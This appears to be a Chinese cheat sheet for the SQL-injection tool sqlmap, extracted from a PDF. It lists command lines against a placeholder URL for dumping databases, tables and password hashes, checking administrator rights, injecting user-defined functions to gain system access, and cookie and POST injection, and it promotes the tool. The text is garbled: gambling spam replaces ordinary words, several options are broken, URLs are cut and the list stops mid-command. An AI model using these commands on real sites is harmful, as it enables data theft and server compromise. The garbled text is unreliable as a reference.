sqlmap使用笔记[中文].pdf

Sqlmap 必威体育精装版测试文档 Email:linuxseclab@ 测试许多款 sql 注入工具 最终还是发现 sqlmap 最为强悍 谁用谁知道！ 赶紧抛弃掉手上一大堆 sql 注入工具吧 : ) 测试环境：ubuntu 10.10 windows 7(x64) sqlmap/1.0-dev (r4405) 如使用过程中出错 请使用下面最近更新的稳定版本: /c0adthmqf1 更新升级 ： sqlmap -update svn checkout /sqlmap/trunk/sqlmap sqlmap-dev 帮助: sqlmap -h 官方必威体育精装版文档:/doc/README.html ******************基本步骤*************** sqlmap -u http://url/news?id=1 --cu ent-use #获取当前用户名称 sqlmap -u /news?id=1 --cu ent-db #获取当前数据库名称 sqlmap -u /news?id=1 --tables -D db_name #列表名 sqlmap -u http://url/news?id=1 --columns -T tablename users-D db_name -v 0 #列字段 sqlmap -u http://url/news?id=1 --dump -C column_name -T table_name -D db_name -v 0 #获取字段内容 ******************信息获取****************** sqlmap -u http://url/news?id=1 --smart --level 3 --users # smart 智能 level 执行测试等级 sqlmap -u http://url/news?id=1 --dbms Mysql --users # dbms 指定数据库类型 sqlmap -u http://url/news?id=1 --users #列数据库用户 sqlmap -u http://url/news?id=1 --dbs#列数据库 sqlmap -u http://url/news?id=1 --passwords #数据库用户密码 sqlmap -u http://url/news?id=1 --passwords-U root -v 0 #列出指定用户数据库密码 sqlmap -u http://url/news?id=1 --dump -C password,user,id -T tablename -D db_name --start 1 --stop 20 #列出指定字段，列出 20 条 sqlmap -u http://url/news?id=1 --dump-all -v 0 #列出所有数据库所有表 sqlmap -u http://url/news?id=1 --privileges #查看权限 sqlmap -u http://url/news?id=1 --privileges -U root #查看指定用户权限 sqlmap -u http://url/news?id=1 --is-dba -v 1 #是否是数据库管理员 sqlmap -u http://url/news?id=1 --roles #枚举数据库用户角色 sqlmap -u http://url/news?id=1 --udf-inject #导入用户自定义函数（获取系统权限！） sqlmap -u http://url/news?id=1 --dump-all --exclude-sysdbs -v 0 #列出当前库所有表 sqlmap -u http://url/news?id=1 --union-cols #union 查询表记录 sqlmap -u http://url/news?id=1 --cookie COOKIE_VALUE #cookie 注入 sqlmap -u http://url/news?id=1 -b #获取banne 信息 sqlmap -u http://url/news?id=1 --data id=3 #post 注入 sqlmap -u http://url/news?id=1 -v